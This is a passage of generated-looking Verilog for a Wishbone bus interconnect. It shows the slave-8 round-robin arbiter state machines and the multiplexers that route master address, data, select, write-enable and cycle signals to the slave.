                    if ( s8_msel_arb2_req[6] ) 
                    begin
                        s8_msel_arb2_next_state = s8_msel_arb2_grant6;
                    end
                    else
                    begin 
                        if ( s8_msel_arb2_req[7] ) 
                        begin
                            s8_msel_arb2_next_state = s8_msel_arb2_grant7;
                        end
                        else
                        begin 
                            if ( s8_msel_arb2_req[0] ) 
                            begin
                                s8_msel_arb2_next_state = s8_msel_arb2_grant0;
                            end
                            else
                            begin 
                                if ( s8_msel_arb2_req[1] ) 
                                begin
                                    s8_msel_arb2_next_state = s8_msel_arb2_grant1;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb2_req[2] ) 
                                    begin
                                        s8_msel_arb2_next_state = s8_msel_arb2_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb2_req[3] ) 
                                        begin
                                            s8_msel_arb2_next_state = s8_msel_arb2_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb2_grant5:
        begin
            if (  !( s8_msel_arb2_req[5]) | 1'b0 ) 
            begin
                if ( s8_msel_arb2_req[6] ) 
                begin
                    s8_msel_arb2_next_state = s8_msel_arb2_grant6;
                end
                else
                begin 
                    if ( s8_msel_arb2_req[7] ) 
                    begin
                        s8_msel_arb2_next_state = s8_msel_arb2_grant7;
                    end
                    else
                    begin 
                        if ( s8_msel_arb2_req[0] ) 
                        begin
                            s8_msel_arb2_next_state = s8_msel_arb2_grant0;
                        end
                        else
                        begin 
                            if ( s8_msel_arb2_req[1] ) 
                            begin
                                s8_msel_arb2_next_state = s8_msel_arb2_grant1;
                            end
                            else
                            begin 
                                if ( s8_msel_arb2_req[2] ) 
                                begin
                                    s8_msel_arb2_next_state = s8_msel_arb2_grant2;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb2_req[3] ) 
                                    begin
                                        s8_msel_arb2_next_state = s8_msel_arb2_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb2_req[4] ) 
                                        begin
                                            s8_msel_arb2_next_state = s8_msel_arb2_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb2_grant6:
        begin
            if (  !( s8_msel_arb2_req[6]) | 1'b0 ) 
            begin
                if ( s8_msel_arb2_req[7] ) 
                begin
                    s8_msel_arb2_next_state = s8_msel_arb2_grant7;
                end
                else
                begin 
                    if ( s8_msel_arb2_req[0] ) 
                    begin
                        s8_msel_arb2_next_state = s8_msel_arb2_grant0;
                    end
                    else
                    begin 
                        if ( s8_msel_arb2_req[1] ) 
                        begin
                            s8_msel_arb2_next_state = s8_msel_arb2_grant1;
                        end
                        else
                        begin 
                            if ( s8_msel_arb2_req[2] ) 
                            begin
                                s8_msel_arb2_next_state = s8_msel_arb2_grant2;
                            end
                            else
                            begin 
                                if ( s8_msel_arb2_req[3] ) 
                                begin
                                    s8_msel_arb2_next_state = s8_msel_arb2_grant3;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb2_req[4] ) 
                                    begin
                                        s8_msel_arb2_next_state = s8_msel_arb2_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb2_req[5] ) 
                                        begin
                                            s8_msel_arb2_next_state = s8_msel_arb2_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb2_grant7:
        begin
            if (  !( s8_msel_arb2_req[7]) | 1'b0 ) 
            begin
                if ( s8_msel_arb2_req[0] ) 
                begin
                    s8_msel_arb2_next_state = s8_msel_arb2_grant0;
                end
                else
                begin 
                    if ( s8_msel_arb2_req[1] ) 
                    begin
                        s8_msel_arb2_next_state = s8_msel_arb2_grant1;
                    end
                    else
                    begin 
                        if ( s8_msel_arb2_req[2] ) 
                        begin
                            s8_msel_arb2_next_state = s8_msel_arb2_grant2;
                        end
                        else
                        begin 
                            if ( s8_msel_arb2_req[3] ) 
                            begin
                                s8_msel_arb2_next_state = s8_msel_arb2_grant3;
                            end
                            else
                            begin 
                                if ( s8_msel_arb2_req[4] ) 
                                begin
                                    s8_msel_arb2_next_state = s8_msel_arb2_grant4;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb2_req[5] ) 
                                    begin
                                        s8_msel_arb2_next_state = s8_msel_arb2_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb2_req[6] ) 
                                        begin
                                            s8_msel_arb2_next_state = s8_msel_arb2_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s8_msel_arb3_req = { ( s8_msel_req[7] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[15] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[14] ) ) } == 2'd3 ) ), ( s8_msel_req[6] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[13] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[12] ) ) } == 2'd3 ) ), ( s8_msel_req[5] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[11] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[10] ) ) } == 2'd3 ) ), ( s8_msel_req[4] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[9] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[8] ) ) } == 2'd3 ) ), ( s8_msel_req[3] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[7] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[6] ) ) } == 2'd3 ) ), ( s8_msel_req[2] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[5] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[4] ) ) } == 2'd3 ) ), ( s8_msel_req[1] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[3] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[2] ) ) } == 2'd3 ) ), ( s8_msel_req[0] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[1] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[0] ) ) } == 2'd3 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s8_msel_arb3_state <= s8_msel_arb3_grant0;
        end
        else
        begin 
            s8_msel_arb3_state <= s8_msel_arb3_next_state;
        end
    end
    always @ (  s8_msel_arb3_state or  { ( s8_msel_req[7] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[15] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[14] ) ) } == 2'd3 ) ), ( s8_msel_req[6] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[13] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[12] ) ) } == 2'd3 ) ), ( s8_msel_req[5] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[11] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[10] ) ) } == 2'd3 ) ), ( s8_msel_req[4] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[9] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[8] ) ) } == 2'd3 ) ), ( s8_msel_req[3] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[7] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[6] ) ) } == 2'd3 ) ), ( s8_msel_req[2] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[5] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[4] ) ) } == 2'd3 ) ), ( s8_msel_req[1] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[3] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[2] ) ) } == 2'd3 ) ), ( s8_msel_req[0] & ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[1] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[0] ) ) } == 2'd3 ) ) } or  1'b0)
    begin
        s8_msel_arb3_next_state = s8_msel_arb3_state;
        case ( s8_msel_arb3_state ) 
        s8_msel_arb3_grant0:
        begin
            if (  !( s8_msel_arb3_req[0]) | 1'b0 ) 
            begin
                if ( s8_msel_arb3_req[1] ) 
                begin
                    s8_msel_arb3_next_state = s8_msel_arb3_grant1;
                end
                else
                begin 
                    if ( s8_msel_arb3_req[2] ) 
                    begin
                        s8_msel_arb3_next_state = s8_msel_arb3_grant2;
                    end
                    else
                    begin 
                        if ( s8_msel_arb3_req[3] ) 
                        begin
                            s8_msel_arb3_next_state = s8_msel_arb3_grant3;
                        end
                        else
                        begin 
                            if ( s8_msel_arb3_req[4] ) 
                            begin
                                s8_msel_arb3_next_state = s8_msel_arb3_grant4;
                            end
                            else
                            begin 
                                if ( s8_msel_arb3_req[5] ) 
                                begin
                                    s8_msel_arb3_next_state = s8_msel_arb3_grant5;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb3_req[6] ) 
                                    begin
                                        s8_msel_arb3_next_state = s8_msel_arb3_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb3_req[7] ) 
                                        begin
                                            s8_msel_arb3_next_state = s8_msel_arb3_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb3_grant1:
        begin
            if (  !( s8_msel_arb3_req[1]) | 1'b0 ) 
            begin
                if ( s8_msel_arb3_req[2] ) 
                begin
                    s8_msel_arb3_next_state = s8_msel_arb3_grant2;
                end
                else
                begin 
                    if ( s8_msel_arb3_req[3] ) 
                    begin
                        s8_msel_arb3_next_state = s8_msel_arb3_grant3;
                    end
                    else
                    begin 
                        if ( s8_msel_arb3_req[4] ) 
                        begin
                            s8_msel_arb3_next_state = s8_msel_arb3_grant4;
                        end
                        else
                        begin 
                            if ( s8_msel_arb3_req[5] ) 
                            begin
                                s8_msel_arb3_next_state = s8_msel_arb3_grant5;
                            end
                            else
                            begin 
                                if ( s8_msel_arb3_req[6] ) 
                                begin
                                    s8_msel_arb3_next_state = s8_msel_arb3_grant6;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb3_req[7] ) 
                                    begin
                                        s8_msel_arb3_next_state = s8_msel_arb3_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb3_req[0] ) 
                                        begin
                                            s8_msel_arb3_next_state = s8_msel_arb3_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb3_grant2:
        begin
            if (  !( s8_msel_arb3_req[2]) | 1'b0 ) 
            begin
                if ( s8_msel_arb3_req[3] ) 
                begin
                    s8_msel_arb3_next_state = s8_msel_arb3_grant3;
                end
                else
                begin 
                    if ( s8_msel_arb3_req[4] ) 
                    begin
                        s8_msel_arb3_next_state = s8_msel_arb3_grant4;
                    end
                    else
                    begin 
                        if ( s8_msel_arb3_req[5] ) 
                        begin
                            s8_msel_arb3_next_state = s8_msel_arb3_grant5;
                        end
                        else
                        begin 
                            if ( s8_msel_arb3_req[6] ) 
                            begin
                                s8_msel_arb3_next_state = s8_msel_arb3_grant6;
                            end
                            else
                            begin 
                                if ( s8_msel_arb3_req[7] ) 
                                begin
                                    s8_msel_arb3_next_state = s8_msel_arb3_grant7;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb3_req[0] ) 
                                    begin
                                        s8_msel_arb3_next_state = s8_msel_arb3_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb3_req[1] ) 
                                        begin
                                            s8_msel_arb3_next_state = s8_msel_arb3_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb3_grant3:
        begin
            if (  !( s8_msel_arb3_req[3]) | 1'b0 ) 
            begin
                if ( s8_msel_arb3_req[4] ) 
                begin
                    s8_msel_arb3_next_state = s8_msel_arb3_grant4;
                end
                else
                begin 
                    if ( s8_msel_arb3_req[5] ) 
                    begin
                        s8_msel_arb3_next_state = s8_msel_arb3_grant5;
                    end
                    else
                    begin 
                        if ( s8_msel_arb3_req[6] ) 
                        begin
                            s8_msel_arb3_next_state = s8_msel_arb3_grant6;
                        end
                        else
                        begin 
                            if ( s8_msel_arb3_req[7] ) 
                            begin
                                s8_msel_arb3_next_state = s8_msel_arb3_grant7;
                            end
                            else
                            begin 
                                if ( s8_msel_arb3_req[0] ) 
                                begin
                                    s8_msel_arb3_next_state = s8_msel_arb3_grant0;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb3_req[1] ) 
                                    begin
                                        s8_msel_arb3_next_state = s8_msel_arb3_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb3_req[2] ) 
                                        begin
                                            s8_msel_arb3_next_state = s8_msel_arb3_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb3_grant4:
        begin
            if (  !( s8_msel_arb3_req[4]) | 1'b0 ) 
            begin
                if ( s8_msel_arb3_req[5] ) 
                begin
                    s8_msel_arb3_next_state = s8_msel_arb3_grant5;
                end
                else
                begin 
                    if ( s8_msel_arb3_req[6] ) 
                    begin
                        s8_msel_arb3_next_state = s8_msel_arb3_grant6;
                    end
                    else
                    begin 
                        if ( s8_msel_arb3_req[7] ) 
                        begin
                            s8_msel_arb3_next_state = s8_msel_arb3_grant7;
                        end
                        else
                        begin 
                            if ( s8_msel_arb3_req[0] ) 
                            begin
                                s8_msel_arb3_next_state = s8_msel_arb3_grant0;
                            end
                            else
                            begin 
                                if ( s8_msel_arb3_req[1] ) 
                                begin
                                    s8_msel_arb3_next_state = s8_msel_arb3_grant1;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb3_req[2] ) 
                                    begin
                                        s8_msel_arb3_next_state = s8_msel_arb3_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb3_req[3] ) 
                                        begin
                                            s8_msel_arb3_next_state = s8_msel_arb3_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb3_grant5:
        begin
            if (  !( s8_msel_arb3_req[5]) | 1'b0 ) 
            begin
                if ( s8_msel_arb3_req[6] ) 
                begin
                    s8_msel_arb3_next_state = s8_msel_arb3_grant6;
                end
                else
                begin 
                    if ( s8_msel_arb3_req[7] ) 
                    begin
                        s8_msel_arb3_next_state = s8_msel_arb3_grant7;
                    end
                    else
                    begin 
                        if ( s8_msel_arb3_req[0] ) 
                        begin
                            s8_msel_arb3_next_state = s8_msel_arb3_grant0;
                        end
                        else
                        begin 
                            if ( s8_msel_arb3_req[1] ) 
                            begin
                                s8_msel_arb3_next_state = s8_msel_arb3_grant1;
                            end
                            else
                            begin 
                                if ( s8_msel_arb3_req[2] ) 
                                begin
                                    s8_msel_arb3_next_state = s8_msel_arb3_grant2;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb3_req[3] ) 
                                    begin
                                        s8_msel_arb3_next_state = s8_msel_arb3_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb3_req[4] ) 
                                        begin
                                            s8_msel_arb3_next_state = s8_msel_arb3_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb3_grant6:
        begin
            if (  !( s8_msel_arb3_req[6]) | 1'b0 ) 
            begin
                if ( s8_msel_arb3_req[7] ) 
                begin
                    s8_msel_arb3_next_state = s8_msel_arb3_grant7;
                end
                else
                begin 
                    if ( s8_msel_arb3_req[0] ) 
                    begin
                        s8_msel_arb3_next_state = s8_msel_arb3_grant0;
                    end
                    else
                    begin 
                        if ( s8_msel_arb3_req[1] ) 
                        begin
                            s8_msel_arb3_next_state = s8_msel_arb3_grant1;
                        end
                        else
                        begin 
                            if ( s8_msel_arb3_req[2] ) 
                            begin
                                s8_msel_arb3_next_state = s8_msel_arb3_grant2;
                            end
                            else
                            begin 
                                if ( s8_msel_arb3_req[3] ) 
                                begin
                                    s8_msel_arb3_next_state = s8_msel_arb3_grant3;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb3_req[4] ) 
                                    begin
                                        s8_msel_arb3_next_state = s8_msel_arb3_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb3_req[5] ) 
                                        begin
                                            s8_msel_arb3_next_state = s8_msel_arb3_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_msel_arb3_grant7:
        begin
            if (  !( s8_msel_arb3_req[7]) | 1'b0 ) 
            begin
                if ( s8_msel_arb3_req[0] ) 
                begin
                    s8_msel_arb3_next_state = s8_msel_arb3_grant0;
                end
                else
                begin 
                    if ( s8_msel_arb3_req[1] ) 
                    begin
                        s8_msel_arb3_next_state = s8_msel_arb3_grant1;
                    end
                    else
                    begin 
                        if ( s8_msel_arb3_req[2] ) 
                        begin
                            s8_msel_arb3_next_state = s8_msel_arb3_grant2;
                        end
                        else
                        begin 
                            if ( s8_msel_arb3_req[3] ) 
                            begin
                                s8_msel_arb3_next_state = s8_msel_arb3_grant3;
                            end
                            else
                            begin 
                                if ( s8_msel_arb3_req[4] ) 
                                begin
                                    s8_msel_arb3_next_state = s8_msel_arb3_grant4;
                                end
                                else
                                begin 
                                    if ( s8_msel_arb3_req[5] ) 
                                    begin
                                        s8_msel_arb3_next_state = s8_msel_arb3_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s8_msel_arb3_req[6] ) 
                                        begin
                                            s8_msel_arb3_next_state = s8_msel_arb3_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    always @ (  s8_msel_pri_out or  s8_msel_arb0_state or  s8_msel_arb1_state)
    begin
        if ( s8_msel_pri_out[0] ) 
        begin
            s8_msel_sel1 = s8_msel_arb1_state;
        end
        else
        begin 
            s8_msel_sel1 = s8_msel_arb0_state;
        end
    end
    always @ (  s8_msel_pri_out or  s8_msel_arb0_state or  s8_msel_arb1_state or  s8_msel_arb2_state or  s8_msel_arb3_state)
    begin
        case ( s8_msel_pri_out ) 
        2'd0:
        begin
            s8_msel_sel2 = s8_msel_arb0_state;
        end
        2'd1:
        begin
            s8_msel_sel2 = s8_msel_arb1_state;
        end
        2'd2:
        begin
            s8_msel_sel2 = s8_msel_arb2_state;
        end
        2'd3:
        begin
            s8_msel_sel2 = s8_msel_arb3_state;
        end
        endcase
    end
    assign s8_mast_sel = ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) );
    always @ (  ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) or  m0_wb_addr_i or  m1_wb_addr_i or  m2_wb_addr_i or  m3_wb_addr_i or  m4_wb_addr_i or  m5_wb_addr_i or  m6_wb_addr_i or  m7_wb_addr_i)
    begin
        case ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s8_wb_addr_o = m0_wb_addr_i;
        end
        3'd1:
        begin
            s8_wb_addr_o = m1_wb_addr_i;
        end
        3'd2:
        begin
            s8_wb_addr_o = m2_wb_addr_i;
        end
        3'd3:
        begin
            s8_wb_addr_o = m3_wb_addr_i;
        end
        3'd4:
        begin
            s8_wb_addr_o = m4_wb_addr_i;
        end
        3'd5:
        begin
            s8_wb_addr_o = m5_wb_addr_i;
        end
        3'd6:
        begin
            s8_wb_addr_o = m6_wb_addr_i;
        end
        3'd7:
        begin
            s8_wb_addr_o = m7_wb_addr_i;
        end
        endcase
    end
    always @ (  ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) or  m0_wb_sel_i or  m1_wb_sel_i or  m2_wb_sel_i or  m3_wb_sel_i or  m4_wb_sel_i or  m5_wb_sel_i or  m6_wb_sel_i or  m7_wb_sel_i)
    begin
        case ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s8_wb_sel_o = m0_wb_sel_i;
        end
        3'd1:
        begin
            s8_wb_sel_o = m1_wb_sel_i;
        end
        3'd2:
        begin
            s8_wb_sel_o = m2_wb_sel_i;
        end
        3'd3:
        begin
            s8_wb_sel_o = m3_wb_sel_i;
        end
        3'd4:
        begin
            s8_wb_sel_o = m4_wb_sel_i;
        end
        3'd5:
        begin
            s8_wb_sel_o = m5_wb_sel_i;
        end
        3'd6:
        begin
            s8_wb_sel_o = m6_wb_sel_i;
        end
        3'd7:
        begin
            s8_wb_sel_o = m7_wb_sel_i;
        end
        endcase
    end
    always @ (  ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) or  m0_wb_data_i or  m1_wb_data_i or  m2_wb_data_i or  m3_wb_data_i or  m4_wb_data_i or  m5_wb_data_i or  m6_wb_data_i or  m7_wb_data_i)
    begin
        case ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s8_wb_data_o = m0_wb_data_i;
        end
        3'd1:
        begin
            s8_wb_data_o = m1_wb_data_i;
        end
        3'd2:
        begin
            s8_wb_data_o = m2_wb_data_i;
        end
        3'd3:
        begin
            s8_wb_data_o = m3_wb_data_i;
        end
        3'd4:
        begin
            s8_wb_data_o = m4_wb_data_i;
        end
        3'd5:
        begin
            s8_wb_data_o = m5_wb_data_i;
        end
        3'd6:
        begin
            s8_wb_data_o = m6_wb_data_i;
        end
        3'd7:
        begin
            s8_wb_data_o = m7_wb_data_i;
        end
        endcase
    end
    assign s8_m0_data_o = s8_data_i;
    assign s8_m1_data_o = s8_data_i;
    assign s8_m2_data_o = s8_data_i;
    assign s8_m3_data_o = s8_data_i;
    assign s8_m4_data_o = s8_data_i;
    assign s8_m5_data_o = s8_data_i;
    assign s8_m6_data_o = s8_data_i;
    assign s8_m7_data_o = s8_data_i;
    always @ (  ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) or  m0_wb_we_i or  m1_wb_we_i or  m2_wb_we_i or  m3_wb_we_i or  m4_wb_we_i or  m5_wb_we_i or  m6_wb_we_i or  m7_wb_we_i)
    begin
        case ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s8_wb_we_o = m0_wb_we_i;
        end
        3'd1:
        begin
            s8_wb_we_o = m1_wb_we_i;
        end
        3'd2:
        begin
            s8_wb_we_o = m2_wb_we_i;
        end
        3'd3:
        begin
            s8_wb_we_o = m3_wb_we_i;
        end
        3'd4:
        begin
            s8_wb_we_o = m4_wb_we_i;
        end
        3'd5:
        begin
            s8_wb_we_o = m5_wb_we_i;
        end
        3'd6:
        begin
            s8_wb_we_o = m6_wb_we_i;
        end
        3'd7:
        begin
            s8_wb_we_o = m7_wb_we_i;
        end
        endcase
    end
    always @ (  posedge clk_i)
    begin
        s8_m0_cyc_r <= m0_s8_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s8_m1_cyc_r <= m1_s8_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s8_m2_cyc_r <= m2_s8_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s8_m3_cyc_r <= m3_s8_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s8_m4_cyc_r <= m4_s8_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s8_m5_cyc_r <= m5_s8_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s8_m6_cyc_r <= m6_s8_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s8_m7_cyc_r <= m7_s8_cyc_o;
    end
    always @ (  ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) or  m0_s8_cyc_o or  m1_s8_cyc_o or  m2_s8_cyc_o or  m3_s8_cyc_o or  m4_s8_cyc_o or  m5_s8_cyc_o or  m6_s8_cyc_o or  m7_s8_cyc_o or  s8_m0_cyc_r or  s8_m1_cyc_r or  s8_m2_cyc_r or  s8_m3_cyc_r or  s8_m4_cyc_r or  s8_m5_cyc_r or  s8_m6_cyc_r or  s8_m7_cyc_r)
    begin
        case ( ( ( ( s8_pri_sel == 2'd0 ) ) ? ( s8_arb_state ) : ( ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( s8_msel_arb0_state ) : ( ( ( ( s8_msel_pri_sel == 2'd1 ) ) ? ( s8_msel_sel1 ) : ( s8_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s8_wb_cyc_o = ( m0_s8_cyc_o & s8_m0_cyc_r );
        end
        3'd1:
        begin
            s8_wb_cyc_o = ( m1_s8_cyc_o & s8_m1_cyc_r );
        end
        3'd2:
        begin
            s8_wb_cyc_o = ( m2_s8_cyc_o & s8_m2_cyc_r );
        end
        3'd3:
        begin
            s8_wb_cyc_o = ( m3_s8_cyc_o & s8_m3_cyc_r );
        end
        3'd4:
        begin
            s8_wb_cyc_o = ( m4_s8_cyc_o & s8_m4_cyc_r );
        end
        3'd5:
        begin
            s8_wb_cyc_o = ( m5_s8_cyc_o & s8_m5_cyc_r );
        end
        3'd6:
        begin
            s8_wb_cyc_o = ( m6_s8_cyc_o & s8_m6_cyc_r );
        end
        3'd7:
        begin
            s8_wb_cyc_o = ( m7_s8_cyc_o & s8_m7_cyc_r );
        end
        endcase
    end
